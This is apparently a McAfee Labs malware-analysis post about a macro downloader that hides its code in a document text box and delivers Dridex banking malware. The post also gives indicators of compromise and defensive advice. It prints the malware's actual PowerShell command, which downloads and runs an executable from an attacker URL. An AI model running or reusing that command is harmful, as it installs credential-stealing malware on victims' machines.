Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered a W97M/Downloader variant that uses a new technique to obfuscate its malicious intentions.
Almost one year ago, we discovered Microsoft Office XML documents containing compressed MSO ActiveMime objects. These objects extract an encrypted OLE object that is executed along with the malicious code contained within multiple macros. (See ‘Banking’ Malware Dridex Arrives via Phishing Email.) Today, this technique has evolved and two new protection layers have been added to this infection chain:
- The malicious XML document is now hidden in a multipart MIME object distributed as .RTF or .DOC files that arrive via phishing or spam emails. Upon opening the attachments on these emails, the malicious code in the embedded OLE document runs.
- The code responsible for downloading and executing the final payload is no longer in the macro. It is now in a TextBox1 object embedded in a form object, shown in the following image:
As we can see in the preceding shot, the malicious code is hidden within the Value and Text attributes from the TextBox1 object, and of course are not visible in the macros. In the image we have resized the TextBox1 object to show the code. The actual TextBox1 object in the malware is very small, which at first effectively hides it.
We found other macros in the document but their only function is to execute the code in TextBox1 object, as the following shots show:
By calling the TextBox1 object, shown above, the malware executes the following PowerShell command to download and execute the malicious payload:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://raspberry.diversified-capital-management.com/zalupa/kurva.php’,’%TEMP%\sdjgbcjkds.exe’);Start-Process ‘%TEMP%\sdjgbcjkds.exe’;
The malicious payload is associated with Dridex, “banking” malware that can steal user credentials for online banking accounts. Dridex was derived from Cridex and both are part of the GameOver Zeus malware family.
Full descriptions of the W97M, X97M, and Dridex malware families are available in our Threat Advisory:
- W97M/Downloader and X97M/Downloader Threat Advisory
We recommend that users never open emails sent by unknown parties, especially if they come with unknown attachments. We also recommend that users not enable macro functionality within Microsoft Office. Malicious emails commonly contain instructions asking users to enable macros and giving specific instructions for how to enable them, but users should never follow these instructions.
During our analysis, the malware contacted the following control servers (with URLs modified for safety):
- hxxp://raspberry(.)diversified-capital-management(.)com
- hxxp://7awhiudnj(.)holycrosschildrensservices(.)info
- hxxp://amytiville(.)boysville(.)org
- hxxp://charity(.)boysville(.)net
- hxxp://backup(.)hcyfs(.)com
- hxxp://j1k4cnee(.)holycrosschildrensservices(.)com
MD5 hashes for the samples we found:
- W97M/Downloaders
- 007460CF17C20C6712F6586B1C3B4D01
- 2E8B7B97F174B4C05EDE779A6E14CE37
- E2A8B1C64949578A090622B2070D16CE
- 0F6FFC572B3EFA5F6104C83800C96A01
- 382F81246E722BBB7C9AC1BDDD04BC9B
- 4BF5207913CBADF3F35E21D1DB2000E3
- 601400AAA44BB0EF053C5ED096BD2BEF
- 70FF8122D780DFDAC91172B3B0AAAEDC
- 9B0404BBB4B3267255B31C39C5D00B77
- F21B33CAE6FDCC92DCAE1E7E3CCD9D9C
- Dridex
- A08E252320256B6D7D2FC90ACFD0954A
McAfee advises all users to keep their antimalware signatures up to date at all times. McAfee products detect this Office malformed Trojan as W97M/Downloader![Partial hash] and Dridex as Trojan-Dridex with DAT Versions 8097 and later.